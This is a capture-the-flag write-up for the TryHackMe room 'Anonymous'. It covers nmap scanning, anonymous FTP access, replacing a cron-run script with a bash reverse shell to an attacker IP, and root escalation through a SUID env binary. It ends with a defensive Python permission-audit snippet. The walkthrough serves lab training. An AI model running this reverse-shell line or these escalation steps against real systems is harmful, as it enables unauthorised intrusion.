Anonymous

Not the hacking group

Difficulty: Medium

Room: Anonymous

Created by: Tyr4el

Standard nmap scan

nmap -sC -sV -vv -A $IP

PORT    STATE SERVICE     REASON         VERSION
21/tcp  open  ftp         syn-ack ttl 63 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 May 17 21:30 scripts [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.11.8.122
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCi47ePYjDctfwgAphABwT1jpPkKajXoLvf3bb/zvpvDvXwWKnm6nZuzL2HA1veSQa90ydSSpg8S+B8SLpkFycv7iSy2/Jmf7qY+8oQxWThH1fwBMIO5g/TTtRRta6IPoKaMCle8hnp5pSP5D4saCpSW3E5rKd8qj3oAj6S8TWgE9cBNJbMRtVu1+sKjUy/7ymikcPGAjRSSaFDroF9fmGDQtd61oU5waKqurhZpre70UfOkZGWt6954rwbXthTeEjf+4J5+gIPDLcKzVO7BxkuJgTqk4lE9ZU/5INBXGpgI5r4mZknbEPJKS47XaOvkqm9QWveoOSQgkqdhIPjnhD
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPjHnAlR7sBuoSM2X5sATLllsFrcUNpTS87qXzhMD99aGGzyOlnWmjHGNmm34cWSzOohxhoK2fv9NWwcIQ5A/ng=
|   256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDHIuFL9AdcmaAIY7u+aJil1covB44FA632BSQ7sUqap
139/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 4s, deviation: 0s, median: 3s
| nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   ANONYMOUS<00>        Flags: <unique><active>
|   ANONYMOUS<03>        Flags: <unique><active>
|   ANONYMOUS<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 12594/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 14837/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 30708/udp): CLEAN (Failed to receive data)
|   Check 4 (port 40880/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2020-05-18T18:36:45+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-18T18:36:45
|_  start_date: N/A

The initial scan shows FTP on port 21 allowing anonymous login, with a directory that is even writable. This is a great starting point. Let’s see what’s on the share.

🚀 ftp 10.10.182.175
Connected to 10.10.182.175.
220 NamelessOne's FTP Server!
Name (10.10.182.175:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 May 17 21:30 scripts
226 Directory send OK.

ftp> cd scripts
250 Directory successfully changed.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          314 May 14 14:52 clean.sh
-rw-rw-r--    1 1000     1000          258 May 18 18:45 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12 03:50 to_do.txt
226 Directory send OK.

Let’s grab all these files offline and take a look.

ftp> prompt off
Interactive mode off.
ftp> mget *

local: clean.sh remote: clean.sh
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for clean.sh (314 bytes).
226 Transfer complete.
314 bytes received in 0.00 secs (98.9482 kB/s)
local: removed_files.log remote: removed_files.log
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for removed_files.log (258 bytes).
226 Transfer complete.
258 bytes received in 0.00 secs (9.1129 MB/s)
local: to_do.txt remote: to_do.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.04 secs (1.7995 kB/s)
(Screenshots: contents of to_do.txt, clean.sh and removed_files.log)

The files give us a good indication that we are dealing with a clean-up script that runs from cron. The good news is we can write to all the files in this directory.

We can safely assume clean.sh runs as a cron job. We’ll set up a netcat listener to catch a bash shell. Shameless plug for shellgen! I grabbed: bash -i >& /dev/tcp/your_ip_here/9001 0>&1

(Screenshot: shellgen output)
https://github.com/briskets/shellgen/

You can do this several ways. I’ll be mounting the share with curlftpfs and modifying the clean.sh with vim.

mkdir ftp

curlftpfs anonymous@$IP ftp/

Run ls to make sure it mounted.

(Screenshot: the mounted ftp/ directory)

(Screenshot: clean.sh modified in vim)

You could also completely replace clean.sh and chmod +x it; it’s up to you.


We’re now namelessone. Let’s stabilize the shell.

namelessone@anonymous:~$ python -c 'import pty;pty.spawn("/bin/bash")'
namelessone@anonymous:~$ export TERM=xterm-256-color
CTRL + Z
stty raw -echo
fg

Let’s get the user flag. Also, if you tried enumerating the SMB share there’s a pics directory with some pics of some puppers 🐶️!

(Screenshot: user flag)

Spin up a Python HTTP server, upload linPEAS, and tee the output to a file to reference later if needed.

namelessone@anonymous:~$ chmod +x linpeas.sh
chmod +x linpeas.sh
namelessone@anonymous:~$ ./linpeas.sh | tee peas.out

uid=1000(namelessone) gid=1000(namelessone) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)


sudo -l requires a password which I don’t know. This user is also a member of the lxd group, which could be a potential privesc path. No need to go this route, but I included the method in Related Reading below if you’re interested.


There’s a SUID bit set on /usr/bin/env. Running /usr/bin/env /bin/sh -p, we can see our user’s euid is now 0(root)!
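Both footholds on this box come down to file permissions: a world-writable script that cron executes, and a set-UID binary. As an added example (not part of the original writeup), the parser below decodes `ls -l` / FTP LIST mode strings and flags exactly those two weaknesses; the four `scripts/` entries are taken from the listing above, while the `env` line is a constructed illustration, since the page never shows that binary’s actual mode or size.

```python
"""Audit Unix mode strings for world-writable executables and set-UID files."""
import re

# Constructed sample: the /scripts FTP listing from the room, plus a made-up
# ls -l line for a set-UID env binary (real mode/size not shown on the page).
SAMPLE_LISTING = """\
drwxrwxrwx    2 111      113          4096 May 17 21:30 scripts
-rwxr-xrwx    1 1000     1000          314 May 14 14:52 clean.sh
-rw-rw-r--    1 1000     1000          258 May 18 18:45 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12 03:50 to_do.txt
-rwsr-xr-x    1 root     root        35000 Jan  1 00:00 env
"""

# mode, link count, owner, group, size, month, day, time-or-year, name
LINE_RE = re.compile(
    r"^([dl-][rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\S+\s+\S+\s+(.+)$"
)


def analyse_mode(mode: str) -> dict:
    """Decode a 10-character mode string into the flags an auditor cares about."""
    ftype, user, group, other = mode[0], mode[1:4], mode[4:7], mode[7:10]
    return {
        "is_dir": ftype == "d",
        "setuid": user[2] in "sS",          # 's' = setuid + exec, 'S' = setuid only
        "setgid": group[2] in "sS",
        "world_writable": other[1] == "w",
        "executable": any(bits[2] in "xst" for bits in (user, group, other)),
    }


def audit_listing(text: str) -> dict:
    """Map each risky entry name to the list of weaknesses found on it."""
    findings = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        mode, owner, _group, name = m.groups()
        flags = analyse_mode(mode)
        issues = []
        if flags["world_writable"] and flags["is_dir"]:
            issues.append("world-writable directory: anyone can add or replace files")
        elif flags["world_writable"] and flags["executable"]:
            issues.append("world-writable executable: content can be changed before cron runs it")
        if flags["setuid"]:
            issues.append(f"setuid binary owned by {owner}: runs with the owner's euid")
        if issues:
            findings[name] = issues
    return findings
```

Running `audit_listing(SAMPLE_LISTING)` flags `scripts`, `clean.sh` and `env` and leaves the two non-writable, non-SUID files alone; the same function works on saved `ls -l` output from a real host.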

(Screenshot: root shell)

Although we didn’t need to do anything fancy to exploit the cron job, it’s good to know common methods for privilege escalation. Raj Chandel has written a very nice article explaining these privesc methods. Bookmark this page, as you’ll run into it on THM and other platforms if you haven’t already.

Related Reading

HackingArticles.in
ExploitDB